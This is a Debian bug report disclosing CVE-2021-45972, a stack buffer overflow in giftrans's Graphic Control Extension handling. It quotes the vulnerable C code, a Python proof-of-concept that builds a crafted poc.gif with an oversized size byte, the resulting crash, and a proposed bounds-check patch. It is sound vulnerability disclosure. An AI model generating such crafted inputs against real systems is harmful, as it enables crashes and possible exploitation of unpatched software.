Debian Bug report logs -
#1002739
giftrans: CVE-2021-45972: Stack based buffer overflow in the giftrans function
Reply or subscribe to this bug.
Toggle useless messages
Report forwarded
to debian-bugs-dist@lists.debian.org, Debian QA Group <packages@qa.debian.org>
:
Bug#1002739
; Package giftrans
.
(Tue, 28 Dec 2021 16:18:03 GMT) (full text, mbox, link).
Acknowledgement sent
to Kolja Grassmann <koljagrassmann@mailbox.org>
:
New Bug report received and forwarded. Copy sent to Debian QA Group <packages@qa.debian.org>
.
(Tue, 28 Dec 2021 16:18:03 GMT) (full text, mbox, link).
Message #5 received at submit@bugs.debian.org (full text, mbox, reply):
Package: giftrans
Version: 1.12.2-19+b1
Severity: important
Tags: security
Dear Maintainer,
There is a stack based buffer overflow in the giftrans function of the giftrans application. The responsible source code looks as follows:
int giftrans(src,dest)
FILE *src;
FILE *dest;
{
unsigned char buffer[3*256],lsd[7],gct[3*256],gce[5];
[...]
case 0xf9: /* Graphic Control Extension */
if (verbose)
(void)fprintf(stderr,"Graphic Control Extension:\n");
(void)fread((void *)(buffer+2),1,1,src);
size=buffer[2];
(void)fread((void *)gce,size,1,src);
The problem here is, that the size value is read from the image file and then size bytes are written into a buffer of size 5. I wrote the following script to test this:
#!/bin/python3
# Writing to poc.gif
f = open("poc.gif", "wb")
sig = b"GIF87a"
w = b"\x10\x00"
h = b"\x10\x00"
flags_one = b"\x00"
bcolor = b"\x01"
aspect = b"\x01"
data = sig + w + h + flags_one + bcolor + aspect
f.write(data)
id = b"\x21"
val = b"\xf9"
size = b"\xff"
buffer_overflow = b"A"*255
data = id + val + size + buffer_overflow
f.write(data)
f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
f.close()
The script generates a poc.gif file. Using this file on Debian 10 with the current version of giftrans does lead to a crash because a buffer overflow is detected:
$ giftrans -c test -o /dev/null poc.gif
*** buffer overflow detected ***: giftrans terminated
Abgebrochen
To address this issue I added a length check to the code locally:
case 0xf9: /* Graphic Control Extension */
if (verbose)
(void)fprintf(stderr,"Graphic Control Extension:\n");
(void)fread((void *)(buffer+2),1,1,src);
size=buffer[2];
if (size > 5) {
return 1;
}
(void)fread((void *)gce,size,1,src);
Best regards
Kolja
-- System Information:
Debian Release: 10.11
APT prefers oldstable-updates
APT policy: (500, 'oldstable-updates'), (500, 'oldstable')
Architecture: amd64 (x86_64)
Kernel: Linux 4.19.0-18-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_OOT_MODULE, TAINT_UNSIGNED_MODULE
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8), LANGUAGE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled
Versions of packages giftrans depends on:
ii libc6 2.28-10
ii x11-common 1:7.7+19
giftrans recommends no packages.
giftrans suggests no packages.
-- no debconf information
Changed Bug title to 'giftrans: CVE-2021-45972: Stack based buffer overflow in the giftrans function' from 'giftrans: Stack based buffer overflow in the giftrans function'.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org
.
(Sun, 02 Jan 2022 08:00:02 GMT) (full text, mbox, link).
Send a report that this bug log contains spam.
Debian bug tracking system administrator <owner@bugs.debian.org>.
Last modified:
Sun Jan 2 14:40:43 2022;
Machine Name:
buxtehude
Debian Bug tracking system
Debbugs is free software and licensed under the terms of the GNU
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
Copyright © 1999 Darren O. Benham,
1997,2003 nCipher Corporation Ltd,
1994-97 Ian Jackson,
2005-2017 Don Armstrong, and many other contributors.